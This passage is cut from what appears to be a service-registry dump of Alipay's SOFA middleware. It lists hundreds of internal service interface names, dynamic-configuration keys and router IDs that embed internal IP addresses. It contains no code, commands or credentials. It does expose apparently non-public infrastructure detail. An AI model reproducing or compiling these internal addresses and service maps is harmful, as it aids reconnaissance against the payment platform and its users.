_ID#@#SOFA.DRM","com.alipay.morderprod.common.service.facade.EncryptDataHmacTokenValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AIVOLVO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.miniunifydata.MiniUnifyDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.deposit.api.AgreementDepositQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PlacardActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.airdut.DeductPayRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.143.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:finslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bktradegw.common.service.facade.QuoteSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.spi.api.ToolDataViewApi:1.0:easyapps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.bank.CampaignReconFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.support.category.OsAccessCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commission.common.service.facade.api.CommissionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.api.RecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.76.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.recoverInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.news.api.special.SpecialGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BAOXIANVALUE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finlinkdata.common.service.facade.account.accountrelation.service.RelationModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.blackmirror.BlackMirrorMarketingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:cif_gz@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataconsole.config.zcache.AppCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.strategycard.api.StrategyCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.MemberConfigOperateLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.homepage.remind.service.RemindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.search.MaterialSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cscenter.service.contact.facade.TelPhoneInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.unimetaservice.resource.facade.ComputerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.creditutcore.common.service.facade.ConsumerCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_RQ_Notify_4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.decisionRiskTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantcore.common.service.facade.modular.api.ModularTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.gain.SumInsuredQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.233.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.fop.api.mng.PackageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.customer.InsCustomerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.net.FaNetAssetTransCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:inspect_async@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.recruit.RecruitApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.event.convertor.facade.ext.EventConvertExtService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antia.common.service.facade.QuotaMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.GlobalConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.biz.trade.gateway.TradeGatewayAdapterTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.prepaidcard.api.PctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.comment.LifeCommentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.openapi.FaultDrillFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniselfop.facade.api.minicontent.MiniContentRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mappprod.common.service.facade.MerchantContractQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.common.service.facade.api.NewsAuthInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.ppwText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordercore:name=com.alipay.ordercore.event.config.compensateTaskLoadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:luckyBagExchangeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.icardcenter.service.facade.api.write.CardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:enterprisecif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lnrdGeneralNameListCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.order.OrderProcessQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.deploy.DeployOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.AqcPmdResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.operation.ProjectTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.condition.RuleConditionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.facade.api.AnnaTopBlockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.ProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitydatacore.common.service.facade.TestAccountRelationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.PromotionRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.biz.file.resolve.DeductChargeInstConfig:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.BudgetAccruedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitErrorCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.confreg.api.ConfregQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ConfigMigrationDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.CertifySaveService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdssdalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsapiDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accha.core.drm.SelfAdaptionDisasterSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantOutcallFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.EventBroadcastQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.155.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.service.facade.AccountCorrectionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_CA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.merchant.common.service.facade.ShopAndMerRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.api.MerchantOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.24.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.44.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scsupport.common.service.facade.config.ActivityTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alp.facade.version.PredictDataVersionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthclaimmng.underwriting.UnderwritingCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.VerifyCallbackFacade:1.0:mobilewealth_alipay_yuebao_withdraw_card_mobileClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rendu.console.common.service.facade.OlapExploreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.operating.facade.service.RiskSubTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.TableConditionValidateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.ActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mybktestapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.15.253.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.apshopcenter.common.service.facade.CategoryOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:defininstchannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.mif.common.service.facade.hyp.HYPCheckServiceFacade:1.0:hypCheckServiceFacade-zm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:apsettlement_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditFreeCardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupClusterDbkey.tradeexprod_sharedata_oss.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.176.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.erecon.biz.service.erc.message.handler.ErcMessageHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recruitcore.facade.api.material.MaterialItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.p78.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingCreditInstTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.location.LocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.syncWebMonitorIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.WorkFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbticketcenter.common.service.facade.api.TicketTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.PromoImmuneWhiteListServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.recruitcore.facade.api.content.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.iliquidity.core.service.transfer.engine.TransferOrderEngine:1.0:transfer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessCommBudgetMainRejectCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue50:twolevel1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.GroupBuyingTaskDRM.taskErrorDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininflux.common.service.facade.mng.recover.InfluxRecoverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:artest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:memberprodAuditCallbackService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.rfm.trade.service.RfmTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:accagovernance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountcore.common.service.facade.DiscountBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcpromochannel.service.PcPromoChannelSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointAccountDetailQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@dcepboss#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.baoxianmerchant.common.service.api.bxh.InsProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TaxiOriginalInfoImportTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securityjs:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodquery.common.service.api.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ibops.common.service.facade.query.UserRefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_MDM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.miniapp.miniappfacade.MiniappQuestionnaireManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opssla.common.service.facade.OpsslaPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAppCreateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenestarwish.common.service.facade.api.FinsCollectRewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.ServerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.score.ItemScoreManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardRuleConditionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbmarketcenter.common.service.facade.activity.service.MarketActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.ResearchDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.resource.facade.ResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:dchaincustomer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.229.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.209.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bbcmng.common.service.facade.BbcEventRecordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.team.TeamApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbpromocore.common.service.facade.UserAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.AppSubpageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.164.148.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.MetaVersionConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.asset.UserAssetRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.guarcore.common.service.facade.guarantee.api.GrtCompensateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.schema.TypeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancollection.common.service.facade.links.CollLinksServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcshield.common.service.facade.userlist.AgdsUserListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.selectcore.common.service.facade.api.SelectResultManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:fundmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.matrix.RegulationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.mng.TenantUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.api.DxRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_reexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.AdvisorOrderManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAppUpgradeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ternadmin.facade.YuyanDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.117.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.moneyfund.api.MftransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimcenter.common.service.InsClaimMultimediaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscenemng.common.service.facade.api.BusinessStrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.battle.downgradableTopForumCardBg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.monitor.alert.AlertManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.usertransfer.TransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.daemon.event.drm.BankCardAsyncCompensateDrmResource.asyncModeOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.payment.service.facade.api.WithdrawQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_ARCHIVE_LOGIC_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:produceOrderFinishHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.bff.StuffStorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:prodtrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktrpafront.facade.JLFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.SettleDepositFacade:1.0@DE